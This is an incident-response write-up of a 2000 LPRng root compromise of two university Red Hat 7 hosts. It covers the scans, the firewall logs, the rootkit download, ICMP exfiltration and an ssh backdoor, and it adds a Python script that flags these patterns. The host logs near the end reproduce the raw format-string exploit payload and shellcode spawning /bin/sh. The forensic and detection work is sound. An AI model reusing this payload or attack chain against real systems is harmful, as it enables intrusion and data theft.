INTRODUCTION
On Nov 25, 2000 two machines on our network were compromised during one attack. 

It appears the suspect was searching specifically for Redhat 7 machines. After a scan of our network to port 23, two machines were found to be running Redhat 7.
An LPRng exploit was then executed against each machine from a different IP address than the one conducting the scan.
Both machines were successfully exploited, giving the suspect root access.

  • A connection was established to a third IP address and the rootkit was downloaded via TCP 514 (rcp).
  • The rootkit replaced several standard unix commands with commands altered to prevent their processes, files and network activity from being displayed.
  • A sniffer was installed and configured to capture data to and from ports 23 (telnet), 110 (pop), 143 (imap) and 21 (ftp).
  • Outgoing ICMP connections were established at regular intervals to a fourth IP address and data was being sent out.
  • The sendmail command was replaced with a trojaned one which installed an ssh backdoor (TCP 15000).
  • System startup files were altered to reactivate the sniffer.
  • The login command was replaced with one which included a backdoor.

This document presents the entire picture of the incident. Most of the information in this document refers to Victim#1; however, Victim#2's compromise was identical (except where noted).

    The information is organized into three sections.

  • The Recon/Scan
  • The Attack
  • The Compromise/Discovery

    THE CAST

    The Bad
  • BadGuy IP#1 (205.177.91.2): source of both scans and source of the exploit attack.
  • BadGuy IP#2 (210.94.114.48)
  • BadGuy IP#3 (38.246.1.9)
  • BadGuy IP#4 (18.242.162.210)

    The Good
  • Victim#1 (X.X.8.60)
  • Victim#2 (X.X.167.56)
    THE LOGS

    Snort Logs
    Snort was running inside the network on the backbone segment. The machines which were compromised were on 2 different segments of the network. The information analyzed by Snort is therefore limited. It offers detailed information on the network scans.

    TCPDump Logs
    Tcpdump was also capturing data inside the network, on the backbone segment. The information captured is therefore limited. It offers detailed information on the Nov 25th network scan as well as some detailed information on the ICMP packets sent from the compromised machines.

    Firewall Logs
    Our organization is a dot.edu. Our firewall is a commercial package which was included (as a bonus) with the web filtering system we purchased. The information which is logged is inadequate for complete ID analysis. However, even incomplete logging is better than no logging. These logs offer the greatest amount of information on the attack. The firewall logs are in the following format:

    StartTime, EndTime, SrcIP, DstIP, SrcPort, DstPort, service, ConnectionDuration, PktsSent, PktsRcvd, FirewallAction

    Host (Victim) Logfiles
    Logfiles gathered from each compromised system provide information on the method of attack. Most importantly, they provide the information needed to understand the events which triggered various entries in the network logs.

    The Recon/Scan

    Overview

    Observations
  • The scans originated from 205.177.91.2.
  • The following logfiles are small sections from very large log files.
  • There were two recent scans discovered which originated from this IP address. Nov 5 was a SYN scan for linuxconf and on Nov 25 a SYN scan for telnet.
  • The scans are fast TCP SYN scans destined for a specific port.
  • In the Nov 25th scan (and attack) there were 17,936 connections from this location with all src ports between 1025 and 4999.
  • The same IP address is used to execute the buffer overflow after vulnerable systems are located by the Nov 25th scan.

    Nov 5, 2000 - SNORT Portscan.log

    Nov  5 13:14:07 205.177.91.2:1809 -> X.X.128.6:98 SYN **S***** 
    Nov  5 13:14:07 205.177.91.2:1807 -> X.X.128.4:98 SYN **S***** 
    Nov  5 13:14:07 205.177.91.2:1808 -> X.X.128.5:98 SYN **S***** 
    Nov  5 13:14:08 205.177.91.2:1830 -> X.X.128.27:98 SYN **S***** 
    Nov  5 13:14:08 205.177.91.2:1831 -> X.X.128.28:98 SYN **S***** 
    Nov  5 13:14:08 205.177.91.2:1832 -> X.X.128.29:98 SYN **S***** 
    Nov  5 13:14:08 205.177.91.2:1919 -> X.X.128.51:98 SYN **S***** 
    Nov  5 13:14:10 205.177.91.2:2074 -> X.X.128.112:98 SYN **S***** 
    Nov  5 13:14:10 205.177.91.2:2075 -> X.X.128.113:98 SYN **S***** 
    Nov  5 13:14:10 205.177.91.2:2190 -> X.X.128.134:98 SYN **S***** 
    Nov  5 13:14:10 205.177.91.2:2076 -> X.X.128.114:98 SYN **S***** 
    Nov  5 13:14:12 205.177.91.2:1947 -> X.X.128.79:98 SYN **S***** 
    Nov  5 13:14:12 205.177.91.2:2356 -> X.X.128.188:98 SYN **S***** 

    Nov 25, 2000 - SNORT Portscan.Log

    Nov 25 14:02:53 205.177.91.2:2654 -> X.X.128.4:23 SYN **S***** 
    Nov 25 14:02:53 205.177.91.2:2656 -> X.X.128.5:23 SYN **S***** 
    Nov 25 14:02:53 205.177.91.2:2664 -> X.X.128.6:23 SYN **S***** 
    Nov 25 14:02:53 205.177.91.2:2701 -> X.X.128.27:23 SYN **S***** 
    Nov 25 14:02:54 205.177.91.2:2762 -> X.X.128.60:23 SYN **S***** 
    Nov 25 14:02:54 205.177.91.2:2794 -> X.X.128.70:23 SYN **S***** 
    Nov 25 14:02:54 205.177.91.2:2807 -> X.X.128.81:23 SYN **S***** 
    Nov 25 14:02:54 205.177.91.2:2813 -> X.X.128.79:23 SYN **S***** 
    Nov 25 14:02:54 205.177.91.2:2808 -> X.X.128.80:23 SYN **S***** 
    Nov 25 14:02:54 205.177.91.2:2817 -> X.X.128.76:23 SYN **S***** 
    Nov 25 14:02:55 205.177.91.2:2945 -> X.X.128.131:23 SYN **S***** 
    Nov 25 14:02:55 205.177.91.2:2949 -> X.X.128.132:23 SYN **S***** 
    Nov 25 14:02:55 205.177.91.2:2951 -> X.X.128.134:23 SYN **S***** 
    Nov 25 14:02:55 205.177.91.2:2952 -> X.X.128.133:23 SYN **S***** 
    Nov 25 14:02:56 205.177.91.2:3052 -> X.X.128.188:23 SYN **S***** 
    Nov 25 14:02:56 205.177.91.2:3104 -> X.X.128.210:23 SYN **S***** 
    Nov 25 14:02:57 205.177.91.2:3125 -> X.X.128.219:23 SYN **S***** 
    Nov 25 14:02:57 205.177.91.2:3119 -> X.X.128.225:23 SYN **S*****

    Nov 25 - SNORT ALERT LOG

    11/25-14:09:16.266354 0:0:EF:3:80:F0 -> 0:0:EF:3:4D:60 type:0x800 len:0x4A
    205.177.91.2:1173 -> X.X.210.38:23 TCP TTL:51 TOS:0x0 ID:36580  DF
    **S***** Seq: 0x1D02DE67   Ack: 0x0   Win: 0x7D78
    TCP Options => MSS: 380 SackOK TS: 17364876 0 NOP WS: 0 
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    11/25-14:03:17.411780 0:0:EF:3:80:F0 -> 0:10:4B:2A:F1:14 type:0x800 len:0x4A
    205.177.91.2:1548 -> X.X.133.7:23 TCP TTL:51 TOS:0x0 ID:59620  DF
    **S***** Seq: 0x654D3B7   Ack: 0x0   Win: 0x7D78
    TCP Options => MSS: 380 SackOK TS: 17328985 0 NOP WS: 0 
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    11/25-14:03:17.423929 0:0:EF:3:80:F0 -> 0:50:DA:2C:12:9A type:0x800 len:0x4A
    205.177.91.2:1562 -> X.X.133.15:23 TCP TTL:51 TOS:0x0 ID:59634  DF
    **S***** Seq: 0x62F807C   Ack: 0x0   Win: 0x7D78
    TCP Options => MSS: 380 SackOK TS: 17328986 0 NOP WS: 0 
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    11/25-14:03:18.374003 0:0:EF:3:80:F0 -> 0:1:2:29:8B:DD type:0x800 len:0x4A
    205.177.91.2:1630 -> X.X.133.48:23 TCP TTL:51 TOS:0x0 ID:59748  DF
    **S***** Seq: 0x622515D   Ack: 0x0   Win: 0x7D78
    TCP Options => MSS: 380 SackOK TS: 17329085 0 NOP WS: 0 
    =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
    11/25-14:03:18.413957 0:0:EF:3:80:F0 -> 0:80:C8:1E:11:E1 type:0x800 len:0x4A
    205.177.91.2:1640 -> X.X.133.52:23 TCP TTL:51 TOS:0x0 ID:59761  DF
    **S***** Seq: 0x684A0BC   Ack: 0x0   Win: 0x7D78
    TCP Options => MSS: 380 SackOK TS: 17329090 0 NOP WS: 0 

    Nov 25 - TCPDUMP

    14:02:53.601174 0:0:ef:3:80:f0 0:a0:36:0:85:cb 0800 74: 205.177.91.2.2654 > X.X.128.4.23: S 69699773:69699773(0) win 32120 <mss 380,sackOK,timestamp 17326609 0,nop,wscale 0> (DF)
    0x0000   4500 003c dd82 4000 3306 2a85 cdb1 5b02        E..<..@.3.*...[.
    0x0010   5858 8004 0a5e 0017 0427 88bd 0000 0000        .....^...'......
    0x0020   a002 7d78 949f 0000 0204 017c 0402 080a        ..}x.......|....
    0x0030   0108 6211 0000 0000 0103 0300                   ..b.........
    14:02:53.615573 0:0:ef:3:80:f0 0:a0:36:0:81:cb 0800 74: 205.177.91.2.2656 > X.X.128.5.23: S 58155330:58155330(0) win 32120 <mss 380,sackOK,timestamp 17326609 0,nop,wscale 0> (DF)
    0x0000   4500 003c dd84 4000 3306 2a82 cdb1 5b02        E..<..@.3.*...[.
    0x0010   5858 8005 0a60 0017 0377 6142 0000 0000        .....`...waB....
    0x0020   a002 7d78 bcc7 0000 0204 017c 0402 080a        ..}x.......|....
    0x0030   0108 6211 0000 0000 0103 0300                   ..b.........
    14:02:53.635891 0:0:ef:3:80:f0 0:a0:36:0:84:32 0800 74: 205.177.91.2.2664 > X.X.128.6.23: S 63619730:63619730(0) win 32120 <mss 380,sackOK,timestamp 17326610 0,nop,wscale 0> (DF)
    0x0000   4500 003c dd8c 4000 3306 2a79 cdb1 5b02        E..<..@.3.*y..[.
    0x0010   5858 8006 0a68 0017 03ca c292 0000 0000        .....h..........
    0x0020   a002 7d78 5b1a 0000 0204 017c 0402 080a        ..}x[......|....
    0x0030   0108 6212 0000 0000 0103 0300                   ..b.........
    14:02:53.750509 0:20:48:58:2:af 0:0:ef:3:80:f0 0800 62:  X.X.128.23.23 > 205.177.91.2.2695: S 703593917:703593917(0) ack 55667634 win 8192 <mss 512,nop,wscale 0>
    0x0000   4500 0030 a17c 0000 4006 9984 5858 8017        E..0.|..@.......
    0x0010   cdb1 5b02 0017 0a87 29ef fdbd 0351 6bb2        ..[.....)....Qk.
    0x0020   7012 2000 86ad 0000 0204 0200 0103 0300        p...............
    14:02:53.865766 0:0:ef:3:80:f0 0:50:4:61:85:98 0800 74: 205.177.91.2.2701 > X.X.128.27.23: S 68115308:68115308(0) win 32120 <mss 380,sackOK,timestamp 17326627 0,nop,wscale 0> (DF)
    0x0000   4500 003c ddb4 4000 3306 2a3c cdb1 5b02        E..<..@.3.*<..[.
    0x0010   5858 801b 0a8d 0017 040f 5b6c 0000 0000        ..........[l....
    0x0020   a002 7d78 c1b0 0000 0204 017c 0402 080a        ..}x.......|....
    0x0030   0108 6223 0000 0000 0103 0300                   ..b#........

    Nov 25 - FIREWALL LOGS

    (Format: StartTime, EndTime, SrcIP, DstIP, SrcPort, DstPort, service, ConnectionDuration in seconds,PktsSent, PktsRcvd, FirewallAction) 

    14:01:37 14:02:54 205.177.91.2 X.X.128.10  2674 23 telnet 0 0 0 Deny
    14:01:37 14:02:54 205.177.91.2 X.X.128.50  2744 23 telnet 0 0 0 Deny
    14:01:37 14:03:13 205.177.91.2 X.X.128.12  2678 23 telnet  7 60 134 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.13  2680 23 telnet  7 60 134 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.17  2684 23 telnet  7 367 374 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.2   2647 23 telnet  7 60 134 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.24  2697 23 telnet  7 270 314 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.27  2701 23 telnet  7 60 74 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.29  2705 23 telnet  7 369 374 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.3   2652 23 telnet  7 60 134 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.4   2654 23 telnet  7 629 314 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.5   2656 23 telnet  7 634 374 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.51  2746 23 telnet  7 60 74 Permit
    14:01:37 14:03:13 205.177.91.2 X.X.128.6   2664 23 telnet  7 634 314 Permit
    14:01:37 14:35:40 205.177.91.2 X.X.128.23  2695 23 telnet  1955 302 314 Permit
    14:01:38 14:02:56 205.177.91.2 X.X.128.108 2868 23 telnet  0 0 0 Deny
    14:01:38 14:02:56 205.177.91.2 X.X.128.109 2887 23 telnet  0 0 0 Deny
    14:01:38 14:02:56 205.177.91.2 X.X.128.78  2814 23 telnet  0 0 0 Deny
    14:01:38 14:03:13 205.177.91.2 X.X.128.106 2870 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.107 2869 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.60  2762 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.70  2794 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.76  2817 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.79  2813 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.80  2808 23 telnet  6 60 74 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.81  2807 23 telnet  6 431 494 Permit
    14:01:38 14:03:13 205.177.91.2 X.X.128.84  2844 23 telnet  6 71 74 Permit
    14:01:39 14:03:13 205.177.91.2 X.X.128.125 2923 23 telnet  5 60 74 Permit
    14:01:39 14:03:13 205.177.91.2 X.X.128.133 2952 23 telnet  5 70 74 Permit
    14:01:39 14:03:13 205.177.91.2 X.X.128.134 2951 23 telnet  5 70 74 Permit

    The Exploit
    The SYN scan produced 2 vulnerable machines.  Both were RedHat 7 Linux. 
    Victim #1 is X.X.8.60; Victim #2 is X.X.167.56 

    This log is from the firewall application. I have numbered each line of the logfile and reference these line numbers in the explanation that follows.

     1. 14:04:08 14:37:57 205.177.91.2 X.X.159.254 4940 23 telnet  1949 624 0 Permit
     2. 14:37:08 14:38:59 210.94.114.48 X.X.8.60 4573 23 telnet  23 1059 1054 Permit
     3. 14:37:36 14:39:09 205.177.91.2 X.X.8.60 1868 515 TCP(515)  5 272 763 Permit
     4. 14:37:36 14:39:09 205.177.91.2 X.X.8.60 1880 3879 TCP(3879)  5 60 74 Permit
     5. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2296 515 TCP(515) 7 272 761 Permit
     6. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2299 3879 TCP(3879) 7 60 74 Permit
     7. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2306 515 TCP(515)  7 272 761 Permit
     8. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2311 3879 TCP(3879)  7 60 74 Permit
     9. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2316 515 TCP(515) 7 272 761 Permit
    10. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2327 3879 TCP(3879)  7 120 148 Permit
    11. 14:37:47 14:39:19 205.177.91.2 X.X.8.60 2498 515 TCP(515)  4 272 761 Permit
    12. 14:37:47 14:39:19 205.177.91.2 X.X.8.60 2509 3879 TCP(3879)  4 60 74 Permit
    13. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2516 515 TCP(515)  3 272 761 Permit
    14. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2532 3879 TCP(3879)  3 60 74 Permit
    15. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2535 515 TCP(515)  3 272 761 Permit
    16. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2549 3879 TCP(3879)  3 60 74 Permit
    17. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2553 515 TCP(515)  3 272 761 Permit
    18. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2563 3879 TCP(3879)  3 60 74 Permit
    19. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2580 515 TCP(515)  3 272 761 Permit
    20. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2594 3879 TCP(3879)  3 60 74 Permit
    21. 14:37:48 14:39:19 205.177.91.2 X.X.8.60 2605 515 TCP(515)  3 272 761 Permit
    22. 14:37:49 14:39:19 205.177.91.2 X.X.8.60 2628 3879 TCP(3879)  2 60 74 Permit
    <clipped>
    23. 14:38:44 14:40:20 205.177.91.2 X.X.8.60 2358 515 TCP(515)  8 272 756 Permit
    24. 14:38:44 14:40:20 205.177.91.2 X.X.8.60 2369 3879 TCP(3879)  8 60 74 Permit
    25. 14:38:44 14:40:20 205.177.91.2 X.X.8.60 2373 515 TCP(515)  8 272 756 Permit
    26. 14:38:44 14:40:20 205.177.91.2  X.X.8.60 2376 3879 TCP(3879)  8 60 74 Permit
    27. 14:38:44 14:42:20 205.177.91.2 X.X.8.60 2319 515 TCP(515) 128 544 1632 Permit
    28. 14:38:45 14:40:20 205.177.91.2 X.X.8.60 2380 515 TCP(515) 7 272 756 Permit
    29. 14:38:45 14:40:20 205.177.91.2 X.X.8.60 2392 3879 TCP(3879)  7 60 74 Permit
    30. 14:38:45 14:40:20 205.177.91.2 X.X.8.60 2399 515 TCP(515)  7 272 756 Permit
    31. 14:41:20 14:42:50 205.177.91.2 X.X.8.60 1136 515 TCP(515)  2 272 764 Permit
    32. 14:41:20 14:42:50 205.177.91.2 X.X.8.60 1147 3879 TCP(3879)  2 60 74 Permit
    33. 14:41:21 14:42:50 205.177.91.2 X.X.8.60 1149 515 TCP(515)  1 284 759 Permit
    34. 14:41:21 14:42:50 205.177.91.2 X.X.8.60 1168 3879 TCP(3879) 1 60 74 Permit
    35. 14:41:21 14:42:50 205.177.91.2 X.X.8.60 1176 3879 TCP(3879)  1 60 74 Permit
    36. 14:41:21 14:42:50 205.177.91.2 X.X.8.60 1183 515 TCP(515)  1 272 767 Permit
    37. 14:41:21 14:42:50 205.177.91.2 X.X.8.60 1188 3879 TCP(3879)  1 60 74 Permit
    38. 14:41:21 14:42:50 205.177.91.2 X.X.8.60 1207 3879 TCP(3879)  1 60 74 Permit
    39. 14:41:22 14:42:50 205.177.91.2 X.X.8.60 1218 3879 TCP(3879)  1 60 74 Permit
    40. 14:41:22 15:13:13 205.177.91.2 X.X.8.60 1236 515 TCP(515)  1823 206 697 Permit
    41. 14:42:23 14:45:54 X.X.8.60 38.246.1.9 1023 514 TCP(514)  133 1222215 112064 Permit
    42. 14:44:26 14:45:44 210.94.114.48 X.X.8.60 icmp  0 0 0 Deny
    43. 14:44:27 14:45:46 210.94.114.48 X.X.8.60 icmp  0 0 0 Deny 
    44. 14:44:28 14:45:46 210.94.114.48 X.X.8.60 icmp 0 0 0 Deny 
    45. 14:44:29 14:45:48 210.94.114.48 X.X.8.60 icmp  0 0 0 Deny 
    46. 14:44:30 14:45:48 210.94.114.48 X.X.8.60 icmp  0 0 0 Deny 
    47. 14:44:51 14:46:14 X.X.8.60 18.242.162.210 icmp 5 0 1058 Permit
    48. 14:45:15 14:48:15 205.177.91.2 X.X.8.60 1023 15000 TCP(15000)  92 2259 2169 Permit
    49. 14:46:01 14:47:25 X.X.8.60 18.242.162.210 icmp  5 0 1058 Permit 
    50. 14:46:13 14:48:15 210.94.114.48 X.X.98.224 4574 23 telnet 34 1058 1006 Permit
    51. 14:47:03 14:48:25 X.X.8.60 18.242.162.210 icmp 4 0 1058 Permit 
    52. 14:47:03 14:49:46 210.94.114.48 X.X.98.224 936 111 UDP(111)  75 0 392 Permit
    53. 14:47:24 14:49:16 210.94.114.48 X.X.167.56 4575 23 telnet  24 993 1006 Permit
    54. 14:47:53 14:49:26 205.177.91.2 X.X.167.56 3228 515 TCP(515)  5 272 763 Permit
    55. 14:48:01 14:49:36 205.177.91.2 X.X.167.56 3230 515 TCP(515)  7 272 761 Permit
    56. 14:48:01 14:49:36 205.177.91.2 X.X.167.56 3231 3879 TCP(3879) 7 60 74 Permit
    57. 14:48:01 14:49:36 205.177.91.2 X.X.167.56 3232 515 TCP(515)  7 272 761 Permit
    58. 14:48:01 14:49:36 205.177.91.2 X.X.167.56 3233 3879 TCP(3879)  7 60 74 Permit

    Explanation of Firewall Logfile

    Line 1. The last scan entry from the firewall log indicates the connection closed at 14:37:57.
    Line 2. A telnet connection is made to Victim#1 from BadGuyIP#2.
    Line 3,4. BadGuyIP#1 connects to the LPR port (515) AND TCP 3879.
    Line 5-30. Followed by a series of connections alternating between port 515 and 3879.
    Line 40. We have root!
    Line 41. Notice the last connection to TCP 515 is still active when a connection is made from Victim#1 port 1023 to BadGuyIP#3 port 514.

    Observations:
  • Connection lasts approximately 3.5 minutes.
  • Connection originates on Victim#1.
  • Dst IP (BadGuyIP#3) is different from the previous two BadGuyIPs. This IP was actually found in a script left in the rootkit directory. The BadGuy uses rcp (TCP 514) to copy files to the victim machine.
  • Src port is 1023! You will see this again!

    Line 42-46. There are a few icmp attempts from BadGuyIP#2. Could he be testing to find out if our network allows incoming icmp? (We don't.)
    Line 47. BadGuy uses ICMP replies. (There are NO requests.)
    The sniffer is now being set up to send data out.

    Observations:
  • Originating IP is Victim#1.
  • Destination is BadGuyIP#4.
  • Connection duration is 5 seconds.
  • There are no pkts sent.
  • Pkts rcvd are 1058. This pkt size remains consistent.

    Line 48. BadGuyIP#1 connects to TCP 15000 using src port 1023. Sshd has now been installed (on TCP 15000) and is running on Victim#1.
    Line 49-51. A couple more outgoing ICMP connections. These become regular events from both Victims over the next few days.
    Line 50, 52. But now there is something really odd. Two isolated incoming connections from BadGuyIP#2 to a different machine on our network (X.X.98.224).
    Could this machine have been Victim#3?

    Observations:
  • Line 50, the src port is 4574.
  • Line 52, UDP traffic; src port is 936 and dst port 111.

    Line 53-58. Now we begin the attack on Victim#2.

    Observation:
  • The attack begins the same as Victim#1.
  • The src port in the telnet connection to Victim#2 below is 4575. Put this next to the telnet in line 50. This increases the possibility that X.X.98.224 was an intended victim.
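To show how the observations above can be turned into repeatable checks, here is an added example (not part of the original report) that parses the firewall log format documented above and applies three rules: a burst of 515/3879 connections from one source, an outbound rcp (TCP 514) connection from an internal host on a privileged source port, and outbound ICMP with packets in only one direction. Treating the anonymised "X.X." prefix as the internal address space, and the thresholds, are assumptions made for this example.

```python
"""Triage rules for the firewall log format used in this write-up:
StartTime EndTime SrcIP DstIP [SrcPort DstPort] service Duration PktsSent PktsRcvd Action
(ICMP records carry no port columns)."""
import re
from collections import defaultdict, namedtuple
from typing import Dict, List, Optional, Tuple

# Assumption for this example: the anonymised "X.X." prefix is our own address space.
INTERNAL_PREFIX = "X.X."
# Thresholds are assumptions chosen for this example, not values from the report.
LPD_PORT, LPD_SIDE_PORT = 515, 3879   # the alternating pair seen in lines 3-39
LPD_MIN_HITS = 5                      # flag a source after this many 515 connections
RCP_PORT = 514                        # rcp/rsh, used to pull the rootkit (line 41)

FwRecord = namedtuple("FwRecord", "start end src dst sport dport service "
                                  "duration pkts_sent pkts_rcvd action")


def parse_line(line: str) -> Optional[FwRecord]:
    """Parse one record; returns None for blank, clipped or malformed lines."""
    fields = line.split()
    if fields and re.fullmatch(r"\d+\.", fields[0]):   # drop the "NN." numbering
        fields = fields[1:]
    try:
        if len(fields) == 11:                            # TCP/UDP: port columns present
            (start, end, src, dst, sport, dport,
             service, dur, sent, rcvd, action) = fields
            sp, dp = int(sport), int(dport)
        elif len(fields) == 9:                           # ICMP: no port columns
            start, end, src, dst, service, dur, sent, rcvd, action = fields
            sp = dp = None
        else:
            return None
        return FwRecord(start, end, src, dst, sp, dp, service,
                        int(dur), int(sent), int(rcvd), action)
    except ValueError:
        return None


def is_internal(ip: str) -> bool:
    return ip.startswith(INTERNAL_PREFIX)


def analyze(lines: List[str]) -> Dict[str, List[str]]:
    """Apply three rules drawn from the observations in this report."""
    findings: Dict[str, List[str]] = defaultdict(list)
    lpd_hits: Dict[Tuple[str, str], Dict[int, int]] = defaultdict(lambda: defaultdict(int))
    for line in lines:
        r = parse_line(line)
        if r is None or r.action != "Permit":
            continue
        # Rule 1: count lpd (515) and 3879 connections per source/destination pair.
        if r.dport in (LPD_PORT, LPD_SIDE_PORT) and is_internal(r.dst):
            lpd_hits[(r.src, r.dst)][r.dport] += 1
        # Rule 2: an internal host opening rcp/rsh (TCP 514) to the outside
        # from a privileged source port, as in line 41.
        if (r.dport == RCP_PORT and is_internal(r.src) and not is_internal(r.dst)
                and r.sport is not None and r.sport < 1024):
            findings["outbound_rcp"].append(
                f"{r.src}:{r.sport} -> {r.dst}:{r.dport} ({r.duration}s, "
                f"{r.pkts_sent} sent / {r.pkts_rcvd} rcvd)")
        # Rule 3: outbound ICMP with packets in one direction only, the
        # reply-without-request pattern of lines 47, 49 and 51.
        if (r.service == "icmp" and is_internal(r.src) and not is_internal(r.dst)
                and (r.pkts_sent == 0) != (r.pkts_rcvd == 0)):
            findings["one_way_icmp"].append(
                f"{r.src} -> {r.dst} at {r.start}: {r.pkts_sent} sent / {r.pkts_rcvd} rcvd")
    for (src, dst), ports in lpd_hits.items():
        if ports[LPD_PORT] >= LPD_MIN_HITS and ports[LPD_SIDE_PORT] > 0:
            findings["lpd_burst"].append(
                f"{src} -> {dst}: {ports[LPD_PORT]} x {LPD_PORT}, "
                f"{ports[LPD_SIDE_PORT]} x {LPD_SIDE_PORT}")
    return dict(findings)


# Sample input: lines copied from the numbered firewall log above.
SAMPLE_LOG = """\
 3. 14:37:36 14:39:09 205.177.91.2 X.X.8.60 1868 515 TCP(515)  5 272 763 Permit
 4. 14:37:36 14:39:09 205.177.91.2 X.X.8.60 1880 3879 TCP(3879)  5 60 74 Permit
 5. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2296 515 TCP(515) 7 272 761 Permit
 7. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2306 515 TCP(515)  7 272 761 Permit
 9. 14:37:44 14:39:19 205.177.91.2 X.X.8.60 2316 515 TCP(515) 7 272 761 Permit
11. 14:37:47 14:39:19 205.177.91.2 X.X.8.60 2498 515 TCP(515)  4 272 761 Permit
<clipped>
41. 14:42:23 14:45:54 X.X.8.60 38.246.1.9 1023 514 TCP(514)  133 1222215 112064 Permit
42. 14:44:26 14:45:44 210.94.114.48 X.X.8.60 icmp  0 0 0 Deny
47. 14:44:51 14:46:14 X.X.8.60 18.242.162.210 icmp 5 0 1058 Permit
48. 14:45:15 14:48:15 205.177.91.2 X.X.8.60 1023 15000 TCP(15000)  92 2259 2169 Permit
49. 14:46:01 14:47:25 X.X.8.60 18.242.162.210 icmp  5 0 1058 Permit
"""

if __name__ == "__main__":
    for rule, hits in analyze(SAMPLE_LOG.splitlines()).items():
        print(rule, hits)
```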
    Victim#1 - Logfiles
    /var/log/messages
     1. Nov 25 14:39:09 Victim#1 SERVER[1616]: Dispatch_input: bad request line 'BBìóÿ
    ¿íóÿ¿îóÿ¿ïóÿ¿XXXXXXXXXXXXXXXXXX000000000000000000000000000000000000000000000000000
    0000000000000000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000000000048secursecurity000000000000000000000000000000
    0000000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000001074433944~P
    ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
    ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
    ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
    ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
    ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P1Û1É1À°FÍ~@
    ~Iå1Ò²f~IÐ1É~IËC~I]øC~I]ôK~IMü~MMôÍ~@1É~IEôCf~I]ìfÇEî^O'~IMð~MEì~IEøÆEü^P~IÐ~
    MôÍ~@~IÐCCÍ~@~IÐCÍ~@~IÃ1ɲ?~IÐÍ~@~IÐAÍ~@ë^X^~Iu^H1À~HF^G~IE^L°^K
    ~Ió~MM^H~MU^LÍ~@èãÿÿÿ/bin/sh' 
    <clipped>
     2. Nov 25 14:42:55 Victim#1 SERVER[2393]: Dispatch_input: bad request line 'BBàóÿ
    ¿áóÿ¿âóÿ¿ãóÿ¿XXXXXXXXXXXXXXXXXX000000000000000000000000000000000000000000000000000
    0000000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000004800000001074433944security000000000000000000000000000000
    0000000000000000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000001074401432^P
    ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P
    ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P
    ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P
    ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P
    ^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P^P1Û1É1À°FÍ^@ 
